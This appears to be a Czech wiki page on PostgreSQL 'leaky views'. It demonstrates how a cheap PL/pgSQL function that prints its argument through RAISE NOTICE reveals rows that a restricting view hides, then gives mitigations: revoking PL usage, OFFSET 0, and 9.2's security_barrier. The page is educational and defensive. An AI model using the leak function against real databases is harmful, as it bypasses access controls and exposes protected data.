192.108.125.15: fix typo PL/plSQL->PL/pgSQL

2012-01-16T12:42:00Z

fix typo PL/plSQL->PL/pgSQL

Nová stránka

V případě, že se používají pohledy k omezení přístupu k určitým řádkům, lze zneužít PL/pgSQL (případně PL/Perl) k získání blokovaných dat.

Postup útoku je relativně jednoduchý - potřebujeme funkci, jejíž parametr je stejného typu jako hodnota, kterou chceme získat, a která vrací logickou hodnotu true. Uvnitř této použijeme ladící výstup pro zobrazení hodnoty parametru. Tato funkce musí mít velice nízkou cenu:
<pre>
CREATE OR REPLACE FUNCTION public.fx(integer)
RETURNS boolean
LANGUAGE plpgsql
COST 1e-05
AS $function$
begin
raise notice '%', $1;
return true;
end;
$function$
</pre>
Připravíme si zdrojovou tabulku, která bude představovat chráněná data, a pohled, který bude zpřístupňovat liché řádky:
<pre>
create table t(a int);
insert into t select generate_series(1,10);
create view v as select * from t where a % 2 = 1;
</pre>
Běžný uživatel bude mít přístup pouze k pohledu v, tj. k lichým řádkům. Pokud útočník kompromituje běžný účet a připraví si funkci fx, pak díky optimalizaci získá obsah sudých řádků. Optimalizátor zjistí, že funkce fx slouží jako filtr a díky nízké ceně se snaží aplikovat tuto funkci co nejdříve - přičemž předběhne funkci, která filtruje obsah podle toho, zda-li je řádek sudý nebo lichý.
<pre>
postgres=# select * from v;
a
---
1
3
5
7
9
(5 rows)

postgres=# select * from v where fx(a);
NOTICE: 1
NOTICE: 2
NOTICE: 3
NOTICE: 4
NOTICE: 5
NOTICE: 6
NOTICE: 7
NOTICE: 8
NOTICE: 9
NOTICE: 10
a
---
1
3
5
7
9
(5 rows)
</pre>
Aktuálně se pracuje na "zamčení" definice pohledu, tak aby nebylo možné podstrčit vlastní funkci - problémem je, že uzamčení může mít negativní dopady na výkon. Předpokládá se, že v PostgreSQL 9.2 bude tento nežádoucí chování blokováno. Dokud ovšem tento problém nebude vyřešen, je nutné zajistit:
* běžný aplikační uživatel nesmí mít možnost vytvářet kód v PL - tak aby kompromitace jeho účtu neohrozila db - což je nejjednodušší a efektivní řešení - přičemž se doporučuje pro vytváření uložených procedur a db objektů používat vyhrazený účet - a to jak pro z důvodů konzistence vlastnictví, tak nyní i z důvodů bezpečnostních.
* pokud pro běžný účet nelze blokovat PL, pak dalším řešením je použití klauzule OFFSET 0 ve všech pohledech, které používáme pro filtrování obsahu z důvodu omezení přístupu k datům. Tím ovšem blokujeme i některé možné optimalizace (např. možného použití indexu).
<pre>
-- ukazka nefunkcniho zabezpeceni
postgres=# explain select * from v where fx(a);
QUERY PLAN
--------------------------------------------------
Seq Scan on t (cost=0.00..46.00 rows=4 width=4)
Filter: (fx(a) AND ((a % 2) = 1))

postgres=# drop view v;
DROP VIEW
postgres=# create view v as select * from t where a % 2 = 1 offset 0;
CREATE VIEW
postgres=# explain select * from v where fx(a);
QUERY PLAN
---------------------------------------------------------------
Subquery Scan on v (cost=0.00..46.12 rows=4 width=4)
Filter: fx(v.a)
-> Limit (cost=0.00..46.00 rows=12 width=4)
-> Seq Scan on t (cost=0.00..46.00 rows=12 width=4)
Filter: ((a % 2) = 1)
</pre>

Pokud to je jen trochu možné, tak je použít první typ zabezpečení - pro vyhrazeného aplikačního uživatele zablokovat možnost vytvářet vlastní funkce:
<pre>
REVOKE USAGE ON LANGUAGE plpgsql FROM public;
</pre>

Poznamka - tento problém je vyřešen v 9.2 pomocí tzv. bezpečnostní bariéry:
<pre>
CREATE OR REPLACE VIEW mysecview5 WITH (security_barrier=true) AS SELECT * FROM x WHERE a % 2 = 0;
postgres=# explain select * from mysecview5 where fx(a) and b between 10 and 30;
QUERY PLAN
--------------------------------------------------------------------------------
Subquery Scan on mysecview5 (cost=0.00..19500.00 rows=8 width=8)
Filter: (fx(mysecview5.a) AND (mysecview5.b >= 10) AND (mysecview5.b <= 30))
-> Seq Scan on x (cost=0.00..19425.00 rows=5000 width=8)
Filter: ((a % 2) = 0)
(4 rows)
</pre>
Pro rozumný výkon tento typ pohledů vyžaduje podmíněné indexy s podmínkou odpovídající podmínce v pohledu.

Leak views - Historie editací

192.108.125.15: fix typo PL/plSQL->PL/pgSQL